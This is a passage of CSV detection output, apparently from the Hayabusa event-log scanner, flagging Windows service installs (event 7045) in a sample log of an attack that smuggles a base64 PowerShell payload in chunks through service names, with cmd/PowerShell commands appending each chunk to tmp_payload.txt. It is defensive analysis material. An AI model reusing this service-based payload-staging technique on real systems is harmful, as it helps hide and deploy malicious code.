tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 